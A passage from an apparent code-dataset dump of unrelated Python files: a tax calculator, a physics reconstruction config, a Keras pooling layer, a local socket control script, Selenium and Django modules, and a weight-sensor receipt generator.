If you do so, it will be used to\n implement the CircuitBreaker pattern around the SOAP calls to the CCH web service.\n\n :param breaker: Optional :class:`CircuitBreaker ` instance\n \"\"\"\n self.breaker = breaker\n\n def apply_taxes(self, shipping_address, basket=None, shipping_charge=None):\n \"\"\"\n Apply taxes to a Basket instance using the given shipping address.\n\n Pass return value of this method to :func:`OrderTaxation.save_details `\n to persist the taxation details, CCH transaction ID, etc in the database.\n\n :param shipping_address: :class:`ShippingAddress ` instance\n :param basket: :class:`Basket ` instance\n :param shipping_charge: :class:`ShippingCharge ` instance\n :return: SOAP Response.\n \"\"\"\n response = self._get_response(shipping_address, basket, shipping_charge)\n\n # Check the response for errors\n respOK = self._check_response_messages(response)\n if not respOK:\n response = None\n\n # Build map of line IDs to line tax details\n cch_line_map = {}\n if response and response.LineItemTaxes:\n cch_line_map = {\n item.ID: item for item in response.LineItemTaxes.LineItemTax\n }\n\n # Apply taxes to line items\n if basket is not None:\n for line in basket.all_lines():\n line_id = str(line.id)\n taxes = cch_line_map.get(line_id)\n self._apply_taxes_to_price(\n taxes, line.purchase_info.price, line.quantity\n )\n\n # Apply taxes to shipping charge\n if shipping_charge is not None:\n for shipping_charge_component in shipping_charge.components:\n shipping_taxes = cch_line_map.get(shipping_charge_component.cch_line_id)\n self._apply_taxes_to_price(shipping_taxes, shipping_charge_component, 1)\n\n # Return CCH response\n return response\n\n def _apply_taxes_to_price(self, taxes, price, quantity):\n # Taxes come in two forms: quantity and percentage based\n # We need to handle both of those here. The tricky part is that CCH returns data\n # for an entire line item (inclusive quantity), but Oscar needs the tax info for\n # each unit in the line (exclusive quantity). So, we use the details provided to\n # derive the per-unit taxes before applying them.\n price.clear_taxes()\n if taxes:\n for tax in taxes.TaxDetails.TaxDetail:\n unit_fee = Decimal(str(tax.FeeApplied)) / quantity\n unit_tax = Decimal(str(tax.TaxApplied)) / quantity\n price.add_tax(\n authority_name=tax.AuthorityName,\n tax_name=tax.TaxName,\n tax_applied=unit_tax,\n fee_applied=unit_fee,\n )\n # Check our work and make sure the total we arrived at matches the total CCH gave us\n total_line_tax = (price.tax * quantity).quantize(self.precision)\n total_applied_tax = Decimal(taxes.TotalTaxApplied).quantize(self.precision)\n if total_applied_tax != total_line_tax:\n raise RuntimeError(\n (\n \"Taxation miscalculation occurred! 
\"\n \"Details sum to %s, which doesn't match given sum of %s\"\n )\n % (total_line_tax, taxes.TotalTaxApplied)\n )\n else:\n price.tax = Decimal(\"0.00\")\n\n def _get_response(self, shipping_address, basket, shipping_charge):\n \"\"\"Fetch CCH tax data for the given basket and shipping address\"\"\"\n response = None\n retry_count = 0\n while response is None and retry_count <= self.max_retries:\n response = self._get_response_inner(\n shipping_address, basket, shipping_charge, retry_count=retry_count\n )\n retry_count += 1\n return response\n\n def _get_response_inner(\n self, shipping_address, basket, shipping_charge, retry_count\n ):\n response = None\n\n def _call_service():\n order = self._build_order(shipping_address, basket, shipping_charge)\n if order is None:\n return None\n response = self.client.service.CalculateRequest(\n self.entity_id, self.divsion_id, order\n )\n return response\n\n try:\n if self.breaker is not None:\n response = self.breaker.call(_call_service)\n else:\n response = _call_service()\n except Exception as e:\n logger.exception(e)\n return response\n\n def _check_response_messages(self, response):\n \"\"\"Raise an exception if response messages contains any reported errors.\"\"\"\n if response is None:\n return False\n if response.Messages:\n for message in response.Messages.Message:\n if message.Code > 0:\n exc = exceptions.build(message.Severity, message.Code, message.Info)\n logger.exception(exc)\n return False\n return True\n\n @property\n def client(self):\n \"\"\"Lazy constructor for SOAP client\"\"\"\n return soap.get_client(self.wsdl, \"CCH\")\n\n def _build_order(self, shipping_address, basket, shipping_charge):\n \"\"\"Convert an Oscar Basket and ShippingAddresss into a CCH Order object\"\"\"\n order = self.client.factory.create(\"ns15:Order\")\n order.InvoiceDate = datetime.now(settings.CCH_TIME_ZONE)\n order.SourceSystem = settings.CCH_SOURCE_SYSTEM\n order.TestTransaction = settings.CCH_TEST_TRANSACTIONS\n order.TransactionType = settings.CCH_TRANSACTION_TYPE\n order.CustomerType = settings.CCH_CUSTOMER_TYPE\n order.ProviderType = settings.CCH_PROVIDER_TYPE\n order.TransactionID = 0\n order.finalize = settings.CCH_FINALIZE_TRANSACTION\n\n # Add CCH lines for each basket line\n if basket is not None:\n for line in basket.all_lines():\n qty = getattr(line, \"cch_quantity\", line.quantity)\n if qty <= 0:\n continue\n # Line Info\n item = self.client.factory.create(\"ns11:LineItem\")\n item.ID = line.id\n item.AvgUnitPrice = Decimal(\n line.line_price_excl_tax_incl_discounts / qty\n ).quantize(Decimal(\"0.00001\"))\n item.Quantity = qty\n item.ExemptionCode = None\n item.SKU = self._get_product_data(\"sku\", line)\n # Product Info\n item.ProductInfo = self.client.factory.create(\"ns21:ProductInfo\")\n item.ProductInfo.ProductGroup = self._get_product_data(\"group\", line)\n item.ProductInfo.ProductItem = self._get_product_data(\"item\", line)\n # Ship From/To Addresses\n item.NexusInfo = self.client.factory.create(\"ns14:NexusInfo\")\n warehouse = line.stockrecord.partner.primary_address\n if warehouse:\n item.NexusInfo.ShipFromAddress = self._build_address(warehouse)\n item.NexusInfo.ShipToAddress = self._build_address(shipping_address)\n # Add line to order\n order.LineItems.LineItem.append(item)\n\n # Add CCH lines for shipping charges\n if shipping_charge is not None and settings.CCH_SHIPPING_TAXES_ENABLED:\n for shipping_charge_component in shipping_charge.components:\n shipping_line = self.client.factory.create(\"ns11:LineItem\")\n 
shipping_line.ID = shipping_charge_component.cch_line_id\n shipping_line.AvgUnitPrice = (\n shipping_charge_component.excl_tax.quantize(Decimal(\"0.00001\"))\n )\n shipping_line.Quantity = 1\n shipping_line.ExemptionCode = None\n shipping_line.SKU = shipping_charge_component.cch_sku\n shipping_line.NexusInfo = self.client.factory.create(\"ns14:NexusInfo\")\n shipping_line.NexusInfo.ShipToAddress = self._build_address(\n shipping_address\n )\n # Add shipping line to order\n order.LineItems.LineItem.append(shipping_line)\n\n # Must include at least 1 line item\n if len(order.LineItems.LineItem) <= 0:\n return None\n\n # Return order\n return order\n\n def _build_address(self, oscar_address):\n addr = self.client.factory.create(\"ns0:Address\")\n addr.Line1 = oscar_address.line1\n addr.Line2 = oscar_address.line2\n addr.City = oscar_address.city\n addr.StateOrProvince = oscar_address.state\n postcode, plus4 = self.format_postcode(oscar_address.postcode)\n addr.PostalCode = postcode\n addr.Plus4 = plus4\n addr.CountryCode = oscar_address.country.code\n return addr\n\n def _get_product_data(self, key, line):\n key = \"cch_product_%s\" % key\n sku = getattr(settings, key.upper())\n sku = getattr(line.product.attr, key.lower(), sku)\n return sku\n\n def format_postcode(self, raw_postcode):\n if not raw_postcode:\n return \"\", \"\"\n postcode, plus4 = raw_postcode[:POSTCODE_LEN], None\n # Set Plus4 if PostalCode provided as 9 digits separated by hyphen\n if len(raw_postcode) == POSTCODE_LEN + PLUS4_LEN + 1:\n plus4 = raw_postcode[POSTCODE_LEN + 1 :]\n return postcode, plus4\n","sub_path":"src/oscarcch/calculator.py","file_name":"calculator.py","file_ext":"py","file_size_in_byte":10545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"312172597","text":"#!/usr/bin/env python\n\nfrom Gaudi.Configuration import *\nfrom Configurables import K4DataSvc\ndsvc = K4DataSvc(\"EventDataSvc\")\n\n# read LCIO files\nfrom Configurables import LCIOInput\nread = LCIOInput(\"read\")\nread.inputs = [\n#\"/cefs/data/FullSim/CEPC240/CEPC_v4/higgs/smart_final_states/E240.Pffh_invi.e0.p0.whizard195//ffh_inv.e0.p0.00001_1000_sim.slcio\"\n#\"/junofs/users/wxfang/CEPC/CEPCOFF/doReco/reco_output/nnh_aa.e0.p0.00010_000000_rec.slcio\"\n\"/cefs/higgs/wxfang/cepc/Pandora/CaloDigi/gamma/Digi_sim_0.slcio\"\n]\nread.collections = {\n #\"COILCollection\" : \"SimTrackerHit\",\n #\"EcalBarrelSiliconCollection\" : \"SimCalorimeterHit\",\n \"MCParticle\" : \"MCParticle\",\n \"ECALBarrel\" : \"CalorimeterHit\",\n \"ECALEndcap\" : \"CalorimeterHit\",\n \"ECALOther\" : \"CalorimeterHit\",\n \"HCALBarrel\" : \"CalorimeterHit\",\n \"HCALEndcap\" : \"CalorimeterHit\",\n \"HCALOther\" : \"CalorimeterHit\",\n \"MUON\" : \"CalorimeterHit\",\n \"LCAL\" : \"CalorimeterHit\",\n \"LHCAL\" : \"CalorimeterHit\",\n \"BCAL\" : \"CalorimeterHit\",\n #\"MarlinTrkTracks\" : \"Track\"\n #\"TPCCollection\" : \"SimTrackerHit\",\n #\"VXDCollection\" : \"SimTrackerHit\"\n}\n##############################################################################\nfrom Configurables import GearSvc\ngearSvc = GearSvc(\"GearSvc\")\ngearSvc.GearXMLFile = \"/junofs/users/wxfang/CEPC/CEPCOFF/doSim/fullDet/GearOutput.xml\"\n##############################################################################\nfrom Configurables import PandoraPFAlg\n\npandoralg = PandoraPFAlg(\"PandoraPFAlg\")\n## KEEP same with lcioinput name for the ReadXXX ###########\npandoralg.ReadMCParticle = \"MCParticle\" \npandoralg.ReadECALBarrel = 
\"ECALBarrel\" \npandoralg.ReadECALEndcap = \"ECALEndcap\" \npandoralg.ReadECALOther = \"ECALOther\" \npandoralg.ReadHCALBarrel = \"HCALBarrel\" \npandoralg.ReadHCALEndcap = \"HCALEndcap\" \npandoralg.ReadHCALOther = \"HCALOther\" \npandoralg.ReadMUON = \"MUON\" \npandoralg.ReadLCAL = \"LCAL\" \npandoralg.ReadLHCAL = \"LHCAL\" \npandoralg.ReadBCAL = \"BCAL\" \npandoralg.ReadKinkVertices = \"KinkVertices\" \npandoralg.ReadProngVertices = \"ProngVertices\" \npandoralg.ReadSplitVertices = \"SplitVertices\" \npandoralg.ReadV0Vertices = \"V0Vertices\" \npandoralg.ReadTracks = \"MarlinTrkTracks\" \npandoralg.WriteClusterCollection = \"PandoraClusters\" \npandoralg.WriteReconstructedParticleCollection = \"PandoraPFOs\" \npandoralg.WriteVertexCollection = \"PandoraPFANewStartVertices\" \npandoralg.AnaOutput = \"/cefs/higgs/wxfang/cepc/Pandora/Ana/gamma/Ana_gamma_test.root\"\n\npandoralg.PandoraSettingsDefault_xml = \"/junofs/users/wxfang/MyGit/MarlinPandora/scripts/PandoraSettingsDefault_wx.xml\"\n#### Do not chage the collection name, only add or delete ###############\npandoralg.TrackCollections = [\"MarlinTrkTracks\"]\npandoralg.ECalCaloHitCollections= [\"ECALBarrel\", \"ECALEndcap\", \"ECALOther\"]\npandoralg.HCalCaloHitCollections= [\"HCALBarrel\", \"HCALEndcap\", \"HCALOther\"]\npandoralg.LCalCaloHitCollections= [\"LCAL\"]\npandoralg.LHCalCaloHitCollections= [\"LHCAL\"]\npandoralg.MuonCaloHitCollections= [\"MUON\"]\npandoralg.MCParticleCollections = [\"MCParticle\"]\npandoralg.RelCaloHitCollections = [\"RecoCaloAssociation_ECALBarrel\", \"RecoCaloAssociation_ECALEndcap\", \"RecoCaloAssociation_ECALOther\", \"RecoCaloAssociation_HCALBarrel\", \"RecoCaloAssociation_HCALEndcap\", \"RecoCaloAssociation_HCALOther\", \"RecoCaloAssociation_LCAL\", \"RecoCaloAssociation_LHCAL\", \"RecoCaloAssociation_MUON\"]\npandoralg.RelTrackCollections = [\"MarlinTrkTracksMCTruthLink\"]\npandoralg.KinkVertexCollections = [\"KinkVertices\"]\npandoralg.ProngVertexCollections= [\"ProngVertices\"]\npandoralg.SplitVertexCollections= [\"SplitVertices\"]\npandoralg.V0VertexCollections = [\"V0Vertices\"]\npandoralg.ECalToMipCalibration = 160.0 \npandoralg.HCalToMipCalibration = 34.8 \npandoralg.ECalMipThreshold = 0.5 \npandoralg.HCalMipThreshold = 0.3 \npandoralg.ECalToEMGeVCalibration= 0.9 #for G2CD Digi, 1.007 for NewLDCaloDigi \npandoralg.HCalToEMGeVCalibration= 1.007 \npandoralg.ECalToHadGeVCalibrationBarrel= 1.12 #very small effect \npandoralg.ECalToHadGeVCalibrationEndCap= 1.12 \npandoralg.HCalToHadGeVCalibration= 1.07\npandoralg.MuonToMipCalibration= 10.0 \npandoralg.DigitalMuonHits= 0 \npandoralg.MaxHCalHitHadronicEnergy = 1.0 \npandoralg.UseOldTrackStateCalculation= 0 \npandoralg.AbsorberRadLengthECal= 0.2854 \npandoralg.AbsorberIntLengthECal= 0.0101 \npandoralg.AbsorberRadLengthHCal= 0.0569 \npandoralg.AbsorberIntLengthHCal= 0.006 \npandoralg.AbsorberRadLengthOther= 0.0569\npandoralg.AbsorberIntLengthOther= 0.006 \n\n##############################################################################\n\n# write PODIO file\nfrom Configurables import PodioOutput\nwrite = PodioOutput(\"write\")\nwrite.filename = \"test.root\"\nwrite.outputCommands = [\"keep *\"]\n\n# ApplicationMgr\nfrom Configurables import ApplicationMgr\nApplicationMgr(\n #TopAlg = [read, pandoralg, write],\n TopAlg = [read, pandoralg],\n EvtSel = 'NONE',\n EvtMax = 10,\n ExtSvc = [dsvc, gearSvc],\n 
OutputLevel=INFO\n)\n","sub_path":"Examples/options/LCIO_read_pan.py","file_name":"LCIO_read_pan.py","file_ext":"py","file_size_in_byte":5802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"352035126","text":"import tensorflow as tf\nimport keras as K\n\n\nclass GlobalExpectationPooling1D(K.layers.Layer):\n \"\"\"Global Expect pooling operation for temporal data.\n # Arguments\n data_format: A string,\n one of `channels_last` (default) or `channels_first`.\n The ordering of the dimensions in the inputs.\n `channels_last` corresponds to inputs with shape\n `(batch, steps, features)` while `channels_first`\n corresponds to inputs with shape\n `(batch, features, steps)`.\n mode: int\n m_trainable: A boolean variable,\n if m_trainable == True, the base will be trainable,\n else the base will be a constant\n m_value: A integer,\n the value of the base to calculate the prob\n # Input shape\n `(batch_size, steps, features,)`\n # Output shape\n 2D tensor with shape:\n `(batch_size, features)`\n \"\"\"\n\n def __init__(self, mode=0, m_trainable=False, m_value=1, **kwargs):\n super(GlobalExpectationPooling1D, self).__init__(**kwargs)\n self.m_value = m_value\n self.mode = mode\n self.m_trainable = m_trainable\n\n def compute_output_shape(self, input_shape):\n return input_shape[0], input_shape[2]\n\n def call(self, x, **kwargs):\n if self.mode == 0:\n # transform the input\n now = tf.transpose(x, [0, 2, 1])\n # x = x - max(x)\n diff_1 = tf.subtract(now, tf.reduce_max(now, axis=-1, keep_dims=True))\n # x = mx\n diff = tf.multiply(diff_1, self.m)\n # prob = exp(x_i)/sum(exp(x_j))\n prob = tf.nn.softmax(diff)\n # Expectation = sum(Prob*x)\n expectation = tf.reduce_sum(tf.multiply(now, prob), axis=-1, keep_dims=False)\n else:\n # transform the input\n now = tf.transpose(x, [0, 2, 1])\n # x - mean(x)\n now_diff = tf.subtract(now, tf.reduce_mean(now, axis=-1, keep_dims=True))\n # x = mx\n now_diff_m = tf.multiply(now_diff, self.m)\n # sgn(x)\n sgn_now = tf.sign(now_diff_m)\n # exp(x - mean) * sgn(x - mean(x)) + exp(x - mean(x))\n diff_2 = tf.add(tf.multiply(sgn_now, tf.exp(now_diff_m)), tf.exp(now_diff_m))\n # x = x/2\n diff_now = tf.div(diff_2, 2)\n # Prob = exp(x) / sum(exp(x))\n prob = diff_now / tf.reduce_sum(diff_now, axis=-1, keep_dims=True)\n expectation = tf.reduce_sum(tf.multiply(now, prob), axis=-1, keep_dims=False)\n return expectation\n\n def get_config(self):\n base_config = super(GlobalExpectationPooling1D, self).get_config()\n return dict(list(base_config.items()))\n\n def build(self, input_shape):\n if self.m_trainable:\n self.m = self.add_weight(name='m',\n shape=(1, 1),\n initializer=K.initializers.Constant(value=self.m_value),\n trainable=True)\n else:\n self.m = self.add_weight(name='m',\n shape=(1, 1),\n initializer=K.initializers.Constant(value=self.m_value),\n trainable=False)\n super(GlobalExpectationPooling1D, self).build(input_shape)\n\n\nif __name__ == '__main__':\n pass\n","sub_path":"code/model/ePooling.py","file_name":"ePooling.py","file_ext":"py","file_size_in_byte":3503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"258758335","text":"import sys\nimport socket\nimport time\n\nsocketCar = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nsocketCar.connect((\"192.168.0.101\", 9000))\nprint(\"connected\")\n\ncmd=\"U\"\ni=0\nwhile True:\n try:\n i+=1\n print(i, cmd)\n socketCar.send((cmd+\"\\n\").encode())\n time.sleep(.05)\n # if i > 100: break\n except 
KeyboardInterrupt:\n break\nsocketCar.close()\n","sub_path":"src/main/python/send_cmds.py","file_name":"send_cmds.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"466982791","text":"from selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\n\nfrom .WebDriverContainer import WebDriverContainer\n\n\nclass HomePageModel(WebDriverContainer):\n __page_container_selector = (By.CLASS_NAME, \"navigation\")\n __link_selector = (By.CSS_SELECTOR, \"li.level0.ui-menu-item > a\")\n\n def __init__(self, driver):\n super().__init__(driver)\n\n @property\n def section_links(self):\n page_container = self.try_find_element(\n self.__page_container_selector, 20)\n\n links = self.try_find_elements_of(\n page_container, self.__link_selector, 20)\n\n return links\n\n\nclass HomePage(WebDriverContainer):\n def __init__(self, driver):\n super().__init__(driver)\n self.__page__ = HomePageModel(driver)\n\n @property\n def section_links(self):\n \"\"\"will return link web elements of sections.\"\"\"\n return self.__page__.section_links\n","sub_path":"src/models/HomePage.py","file_name":"HomePage.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"295936955","text":"from ..object import Trait\n\ndef Parameter(name, attribute=None, type=object, required=False, default=None):\n\n class Parameter(Trait):\n\n def __init__(self, *args, **kwargs):\n param = kwargs.get(name)\n classname = __builtins__['type'](self).__name__\n\n try:\n _type = tuple(type)\n except TypeError:\n _type = (type, )\n\n if param is None and required:\n raise ValueError(\"Parameter {} is required to instantiate {}\".format(name, classname))\n elif param is None:\n setattr(self, attribute or name, default or param)\n else:\n if not isinstance(param, _type):\n param_type = __builtins__['type'](param).__name__\n ok_params = \" or \".join(t.__name__ for t in _type)\n raise TypeError(\"Parameter {} must be of type {},\"\n \" not {}\".format(name, ok_params, param_type))\n setattr(self, attribute or name, param)\n\n Parameter.__qualname__ = Parameter.__name__\n return Parameter\n","sub_path":"abstraits/trait/parameter.py","file_name":"parameter.py","file_ext":"py","file_size_in_byte":1131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"479681348","text":"import queue\nimport numpy as np\nimport time\nfrom collections import defaultdict\nimport json\n#from cvs_data_read import csv_file_read as cfr\n#from cvs_data_read import ground_truth_read as gtr\n\nfrom weight_sensor import WeightSensor\nfrom weight_sensor import weight_based_item_estimate\n\nimport sys\nimport logging\n\nfrom clients import (\n CpsMongoClient,\n CpsApiClient,\n TestCaseClient,\n)\nfrom cli import parse_configs\nfrom log import setup_logger\n\n\nlogger = logging.getLogger(__name__) # pylint: disable=invalid-name\n\n\ndef main(args=None):\n args = parse_configs(args)\n setup_logger(args.log_level)\n mongo_client = CpsMongoClient(args.db_address)\n api_client = CpsApiClient()\n test_client = TestCaseClient(mongo_client, api_client)\n #test_client.load(f\"{args.command}-{args.sample}\")\n logger.info(f\"Available Test Cases are {test_client.available_test_cases}\")\n test_client.set_context(args.command, load=False)\n generate_receipts(test_client)\n\ndef 
load_product_locations(test_client,Weight_sensor_number):\n productList = test_client.list_products()\n out_sensor_product_info = []\n weight_sensor_info = [[] for jj in range(Weight_sensor_number)]\n for aProduct in productList:\n item_info = [(aProduct.product_id.barcode, aProduct.name), aProduct.weight, aProduct.price]\n allFacings = test_client.find_product_facings(aProduct.product_id)\n if len(allFacings) == 0:\n out_sensor_product_info.append(item_info)\n continue\n for aFacing in allFacings:\n for plateLoc in aFacing.plate_ids:\n sensor_number = (plateLoc.gondola_id - 1) * 6 * 12 + (plateLoc.shelf_index- 1) * 12 + plateLoc.plate_index -1\n weight_sensor_info[sensor_number].append(item_info)\n return weight_sensor_info, out_sensor_product_info\n\ndef get_sensor_batch(test_client, start_time, batch_length, Weight_sensor_number):\n if start_time <= 0:\n # the first time, we don't know when the timestamps start, so let's find out\n first_data = test_client.find_first_after_time(\"plate_data\",0.0)[0]\n start_time = first_data.timestamp\n\n batch_data = test_client.find_all_between_time(\"plate_data\", start_time, start_time+batch_length)\n if len(batch_data) == 0:\n return None, -1\n weight_update_data = [np.empty((0,2)) for jj in range(Weight_sensor_number)]\n currentTime = start_time\n for rawData in batch_data:\n currentTime = rawData.timestamp\n startShelf = rawData.plate_id.shelf_index\n startPlate = rawData.plate_id.plate_index\n gondolaId = rawData.plate_id.gondola_id\n dataSize = rawData.data.shape\n nSamples = dataSize[0]\n nShelves = dataSize[1]\n nPlates = dataSize[2]\n ts = np.array(range(nSamples))*(1.0/60) + currentTime # the timestamps in this packet\n ts = ts.reshape((nSamples,1))\n for jj in range(nShelves):\n for kk in range(nPlates):\n weightData = (rawData.data[:,jj,kk]).reshape(nSamples,1)\n if not(np.isnan(weightData).all()):\n sensor_number = (gondolaId - 1) * 6 * 12 + (startShelf+jj- 1) * 12 + startShelf + kk -1\n updateData = np.hstack((ts,weightData))\n prevData = weight_update_data[sensor_number]\n \n weight_update_data[sensor_number] = np.vstack((prevData, updateData))\n\n return weight_update_data, currentTime \n \ndef generate_receipts(test_client):\n Weight_sensor_number = 360\n \n detected_weight_event_queue = [queue.Queue(0) for kk in\n range(Weight_sensor_number)] # event sotor queue of each sensor\n total_detected_queue = queue.Queue(0) # number changed_weight timestamp #total queue of detected event\n merged_detected_queue = queue.Queue(0)\n\n #ground truth data read\n sensor_info, out_info = load_product_locations(test_client, Weight_sensor_number)\n\n\n weight_sensor_list = [WeightSensor(jj, {'1':[10,10,2]}, np.array([]), np.array([])) for jj in range(Weight_sensor_number)]\n \n receipts = defaultdict(list)\n buffer_info = []\n pre_timestamp = 0\n pre_system_time = time.time()\n moreData, next_time = get_sensor_batch(test_client, -1, 1.0, Weight_sensor_number)\n while moreData is not None:\n for sensor_number in range(Weight_sensor_number):\n update_data = moreData[sensor_number]\n if update_data.shape[0] == 0:\n continue # no data loaded from the batch\n update_wv = update_data[:,1]\n update_ts = update_data[:,0]\n weight_sensor_list[sensor_number].value_update(total_detected_queue, detected_weight_event_queue, update_wv, update_ts)\n #time.sleep(0.1)\n\n logger.debug(\"Detected {} events\".format(total_detected_queue.qsize()))\n\n while not total_detected_queue.empty():\n tmp_info = total_detected_queue.get()\n tmp_timestamp = tmp_info[2]\n \n 
new_event = False\n if abs(pre_timestamp - tmp_timestamp) > 2:\n new_event = True\n if new_event:\n if len(buffer_info) > 0:\n merged_detected_queue.put(buffer_info)\n buffer_info = []\n if len(buffer_info) < 1:\n pre_system_time = time.time()\n buffer_info.append(tmp_info)\n pre_timestamp = tmp_timestamp\n #total_detected_queue.task_done()\n \n now_time = time.time()\n \n if now_time - pre_system_time > 1:\n if len(buffer_info)>0:\n #print(now_time - pre_system_time)\n merged_detected_queue.put(buffer_info)\n buffer_info = []\n pre_system_time = time.time()\n \n while not merged_detected_queue.empty():\n detected_event = merged_detected_queue.get()\n\n logger.debug(detected_event)\n sensor_number_list =[]\n total_changed_weight = 0\n event_timestamp =0\n for kk in range(len(detected_event)):\n sub_event = detected_event[kk]\n sensor_number_list.append(sub_event[0])\n total_changed_weight = total_changed_weight + sub_event[1]\n event_timestamp = sub_event[2]\n \n item_fin_name, item_fin_number, item_fin_price = weight_based_item_estimate(sensor_number_list, total_changed_weight, sensor_info, out_info)\n weight_based_item_info =[event_timestamp, item_fin_name, item_fin_number, item_fin_price]\n logger.debug(weight_based_item_info)\n # who is in the store?\n try:\n target_list = test_client.find_first_after_time(\"full_targets\", event_timestamp)\n except KeyError:\n logger.error(\"Could not load targets at time={}\".format(event_timestamp))\n else:\n if target_list is None:\n logger.error(\"No targets in database\")\n elif len(target_list) > 0:\n target_list = target_list[0]\n logger.debug(\"There are {} people in the store\".format(len(target_list.targets)))\n chosen = target_list.targets[0].target_id\n receipts[chosen].append(item_fin_name[0])\n \n #merged_detected_queue.task_done()\n moreData,next_time = get_sensor_batch(test_client, next_time, 0.5, Weight_sensor_number)\n printout_receipts(test_client, receipts,'BASELINE-1.json')\n\ndef printout_receipts(test_client, receipts, receiptFile):\n logger.warn(receipts)\n with open(receiptFile, 'w') as outFile:\n json.dump(receipts, outFile)\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","sub_path":"cpsdriver/old_main.py","file_name":"old_main.py","file_ext":"py","file_size_in_byte":8066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"641556095","text":"import timm\n\nimport torch\nimport torch.nn as nn\n\n\nfrom dadeit.ingredient import Block\nfrom dadeit.utils import register_value\n\n\nclass DADeiT(nn.Module):\n def __init__(self, pretrained, patch_size=16, embed_dim=768, depth=12, num_heads=12):\n super().__init__()\n\n self.cls_token = pretrained.cls_token\n self.dist_token = pretrained.dist_token\n self.pos_embed = pretrained.pos_embed\n\n self.patch_embed = pretrained._modules[\"patch_embed\"]\n self.pos_drop = pretrained._modules[\"pos_drop\"]\n blocks = pretrained._modules[\"blocks\"]\n\n self.blocks = nn.Sequential(\n Block(blocks[0], 0),\n Block(blocks[1], 1),\n Block(blocks[2], 2),\n Block(blocks[3], 3),\n Block(blocks[4], 4),\n Block(blocks[5], 5),\n Block(blocks[6], 6),\n Block(blocks[7], 7),\n Block(blocks[8], 8),\n Block(blocks[9], 9),\n Block(blocks[10], 10),\n Block(blocks[11], 11),\n )\n\n self.norm = pretrained._modules[\"norm\"]\n self.pre_logits = pretrained._modules[\"pre_logits\"]\n self.head = pretrained._modules[\"head\"]\n\n self.head_dist = pretrained._modules[\"head_dist\"]\n\n def forward_debug(self, x, features_dict=None):\n x = 
self.patch_embed(x)\n\n register_value(\"patch_embed\", x.clone().detach(), features_dict)\n\n cls_token = self.cls_token.expand(x.shape[0], -1, -1) # stole cls_tokens impl from Phil Wang, thanks\n x = torch.cat((cls_token, self.dist_token.expand(x.shape[0], -1, -1), x), dim=1)\n\n x = self.pos_drop(x + self.pos_embed)\n\n register_value(\"concat+pos_embed\", x.clone().detach(), features_dict)\n\n if features_dict is not None:\n x, features_dict = self.blocks((x, features_dict))\n x = self.norm(x)\n else:\n x = self.blocks(x)\n x = self.norm(x)\n\n register_value(\"blocks\", x.clone().detach(), features_dict)\n\n x = x[:, 0], x[:, 1]\n\n register_value(\"cls_feature\", x[0].clone().detach(), features_dict)\n\n register_value(\"dist_feature\", x[1].clone().detach(), features_dict)\n\n x, x_dist = self.head(x[0]), self.head_dist(x[1]) # x must be a tuple\n\n if features_dict is not None:\n return (x + x_dist) / 2, features_dict\n else:\n return (x + x_dist) / 2\n\n\n def forward(self, x, features_dict=None):\n x = self.patch_embed(x)\n # if features_dict is not None:\n # features_dict[\"patch_embed\"].append(x.clone().detach())\n\n register_value(\"patches\", x.clone(), features_dict)\n\n cls_token = self.cls_token.expand(x.shape[0], -1, -1) # stole cls_tokens impl from Phil Wang, thanks\n x = torch.cat((cls_token, self.dist_token.expand(x.shape[0], -1, -1), x), dim=1)\n\n x = self.pos_drop(x + self.pos_embed)\n\n # if features_dict is not None:\n # features_dict[\"concat+pos_embed\"].append(x.clone().detach())\n\n if features_dict is not None:\n x, features_dict = self.blocks((x, features_dict))\n x = self.norm(x)\n else:\n x = self.blocks(x)\n x = self.norm(x)\n\n # if features_dict is not None:\n # features_dict[\"blocks\"].append(x.clone().detach())\n\n x = x[:, 0], x[:, 1]\n\n # if features_dict is not None:\n # features_dict[\"cls_feature\"].append(x[0].clone().detach())\n\n # if features_dict is not None:\n # features_dict[\"dist_feature\"].append(x[1].clone().detach())\n\n x, x_dist = self.head(x[0]), self.head_dist(x[1]) # x must be a tuple\n\n if features_dict is not None:\n return (x + x_dist) / 2, features_dict\n else:\n return (x + x_dist) / 2\n","sub_path":"dadeit/module.py","file_name":"module.py","file_ext":"py","file_size_in_byte":3809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"117935757","text":"from django.conf.urls import patterns, url\nfrom volunteer import views\n\nurlpatterns = patterns('',\n url(r'^create/$', views.create, name='create'),\n url(r'^delete/(?P\\d+)/$', views.delete, name='delete'),\n url(r'^delete_resume/(?P\\d+)/$', views.delete_resume, name='delete_resume'),\n url(r'^download_resume/(?P\\d+)/$', views.download_resume, name='download_resume'),\n url(r'^edit/(?P\\d+)/$', views.edit, name='edit'),\n url(r'^general_report/$', views.general_report, name='general_report'),\n url(r'^individual_report/(?P\\d+)$', views.individual_report, name='individual_report'),\n url(r'^list/$', views.list, name='list'),\n url(r'^options/$', views.options, name='options'),\n url(r'^profile/(?P\\d+)/$', views.profile , name='profile'),\n url(r'^search/$', views.search, name='search'),\n)\n","sub_path":"vms/volunteer/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"339977375","text":"from django.shortcuts import render, get_object_or_404\nfrom django.shortcuts import HttpResponse\nfrom 
django.contrib.auth.decorators import login_required\nfrom .models import Topic\nfrom question.models import Question\nfrom django.db.models import Count\n\nMAX_TOPICS = 10\n\n\n@login_required\ndef FindTopic(request, topic_name):\n topics = Topic.objects.filter(name__icontains=topic_name)\n if not topics:\n return HttpResponse(\"No topic matching\")\n topic_response = ''\n for topic in topics:\n topic_response += '' + topic.name + '
